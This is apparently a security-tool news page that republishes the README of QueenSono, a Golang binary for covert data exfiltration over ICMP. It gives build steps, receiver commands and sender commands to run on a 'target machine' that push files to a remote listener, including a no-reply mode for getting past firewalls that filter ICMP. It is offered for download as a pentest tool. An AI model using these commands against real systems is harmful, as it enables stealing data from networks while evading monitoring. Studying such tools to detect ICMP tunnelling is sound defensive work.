Security
Headlines
HeadlinesLatestCVEs

Headline

QueenSono - Golang Binary For Data Exfiltration With ICMP Protocol

<p><a href="https://1.bp.blogspot.com/-p5_2_IEv9P8/YUuqKRcI1rI/AAAAAAAAvSg/hsnZHGNuRTEP9G-_v8lbWCSQYvVXbj3XQCNcBGAsYHQ/s1350/QueenSono_2_qssono-trunc.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="571" data-original-width="1350" height="270" src="https://1.bp.blogspot.com/-p5_2_IEv9P8/YUuqKRcI1rI/AAAAAAAAvSg/hsnZHGNuRTEP9G-_v8lbWCSQYvVXbj3XQCNcBGAsYHQ/w640-h270/QueenSono_2_qssono-trunc.gif" width="640" /></a></p><div><br /></div> <p style="text-align: left;"> QueenSono tool only relies on the fact that ICMP protocol isn’t monitored. It is quite common. It could also been used within a system with basic ICMP inspection (ie. frequency and content length watcher). Try to imitate <a href="https://github.com/ytisf/PyExfil" rel="nofollow" target="_blank" title="PyExfil">PyExfil</a> (and others) with the idea that the target machine does not necessary have python installed (so provide a binary could be useful)</p><p align="center"><span></span></p><a name=’more’></a> <br /><p></p><span style="font-size: x-large;"><b>Install</b></span><br /> <p><em>> Install the binary from source</em></p> <p>Clone the repo and download the dependencies locally:</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="git clone https://github.com/ariary/QueenSono.git make before.build “><pre><code>git clone https://github.com/ariary/QueenSono.git<br />make before.build<br /></code></pre></div> <p>To build the ICMP <a href="https://www.kitploit.com/search/label/Packet%20Sender” target="_blank" title="packet sender">packet sender</a> <code>qssender</code> :</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content=" build.queensono-sender “><pre><code> build.queensono-sender<br /></code></pre></div> <p>To build the ICMP packet receiver <code>qsreceiver</code> :</p> <div class="snippet-clipboard-content position-relative” data-snippet-clipboard-copy-content=" build.queensono-receiver “><pre><code> build.queensono-receiver<br /></code></pre></div> <br /><span style="font-size: x-large;"><b>Usage</b></span><br /> <p><code>qssender</code> is the binary which will send ICMP packet to the <a href="https://www.kitploit.com/search/label/Listener” target="_blank" title="listener">listener</a> , so it is the binary you have to transfer on your target machine.</p> <p><code>qsreceiver</code> is the listener on your local machine (or wherever you could receive icmp packet)</p> <p>All commands and flags of the binaries could be found using <code>–help</code></p> <br /><span style="font-size: large;"><b>Example 1: Send with “ACK"</b></span><br /> <p><em>> In this example we want to send a big file and look after echo reply to ackowledge the reception of the <a href="https://www.kitploit.com/search/label/Packets” target="_blank" title="packets">packets</a> (ACK).</em></p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-mDD0xXmoAd0/YUup-c0l0aI/AAAAAAAAvSc/KwlmdWaRXWYLWELL21Bz-rh-UIUYPSsuwCNcBGAsYHQ/s1350/QueenSono_1_qssono.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="571" data-original-width="1350" height="270" src="https://1.bp.blogspot.com/-mDD0xXmoAd0/YUup-c0l0aI/AAAAAAAAvSc/KwlmdWaRXWYLWELL21Bz-rh-UIUYPSsuwCNcBGAsYHQ/w640-h270/QueenSono_1_qssono.gif" width="640" /></a></div><p><br /></p> <p>On local machine:</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="$ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt “><pre><code>$ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt<br /></code></pre></div> <details> <summary><b>Explanation</b></summary> <li> <code>-l 0.0.0.0</code>listen on all interfaces for ICMP packet </li> <li> <code>-f received_bible.txt</code> save received data in a file </li> <li><code>-p</code> show a progress bar of received data </li> </details> <p>On target machine:</p> <div class="snippet-clipboard-content position-relative” data-snippet-clipboard-copy-content="$ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt #download a huge file (for the example) $ qssender send file -d 2 -l 127.0.0.1 -r 10.0.0.92 -s 50000 bible.txt “><pre><code>$ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt #download a huge file (for the example)<br />$ qssender send file -d 2 -l 127.0.0.1 -r 10.0.0.92 -s 50000 bible.txt<br /></code></pre></div> <details> <summary><b>Explanation</b></summary> <li> <code>send file</code> for sending file (<code>bible.txt</code> is the file in question) </li> <li> <code>-d 2</code> send a packet each 2 seconds </li> <li><code>-l 127.0.0.1</code> the listening address for <i>echo reply</i> </li> <li><code>-r 10.0.0.92</code> the address of my remote machine with <code>qsreceiver</code> listening</li> <li><code>-s 50000</code> the data size I want to send in each packet</li> </details> <br /><span style="font-size: large;"><b>Example 2: Send without “ACK"</b></span><br /> <p><em>> In this example we want to send a message without waiting for echo reply (it could be useful in case the target <a href="https://www.kitploit.com/search/label/Firewall” target="_blank” title="firewall">firewall</a> filters incoming icmp packet)</em></p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-p5_2_IEv9P8/YUuqKRcI1rI/AAAAAAAAvSg/hsnZHGNuRTEP9G-_v8lbWCSQYvVXbj3XQCNcBGAsYHQ/s1350/QueenSono_2_qssono-trunc.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="571" data-original-width="1350" height="270" src="https://1.bp.blogspot.com/-p5_2_IEv9P8/YUuqKRcI1rI/AAAAAAAAvSg/hsnZHGNuRTEP9G-_v8lbWCSQYvVXbj3XQCNcBGAsYHQ/w640-h270/QueenSono_2_qssono-trunc.gif" width="640" /></a></div><p><br /></p> <p>On local machine:</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="$ qsreceiver receive truncated 1 -l 0.0.0.0 “><pre><code>$ qsreceiver receive truncated 1 -l 0.0.0.0<br /></code></pre></div> <details> <summary> <b>Explanation</b></summary> <li><code>receive truncated 1</code> does not wait indefinitely if we don’t received all the packets. (<code>1</code> is the delay used with <code>qssender</code>)</li> </details> <p>On target machine:</p> <div class="snippet-clipboard-content position-relative” data-snippet-clipboard-copy-content="$ qssender send “thisisatest i want to send a string w/o waiting for the echo reply” -d 1 -l 127.0.0.1 -r 10.0.0.190 go.mod -s 1 -N “><pre><code>$ qssender send “thisisatest i want to send a string w/o waiting for the echo reply” -d 1 -l 127.0.0.1 -r 10.0.0.190 go.mod -s 1 -N<br /></code></pre></div> <details> <summary>Explanation</summary> <li> <code>-N</code> noreply option (don’t wait for <i>echo reply</i>) </li> </details> <br /><span style="font-size: large;"><b>Notes</b></span><br /> <ul> <li>only work on Linux (due to the use of golang net icmp package)</li> <li>need <code>cap_net_raw capabilities</code></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download” href="https://github.com/ariary/QueenSono" rel="nofollow" target="_blank" title="Download QueenSono">Download QueenSono</a></span></b></div>

kitploit
#golang#Pentest#Pentest Tool#Python#QueenSono#Remote

kitploit: Latest News

JadedWraith - Light-weight UNIX Backdoor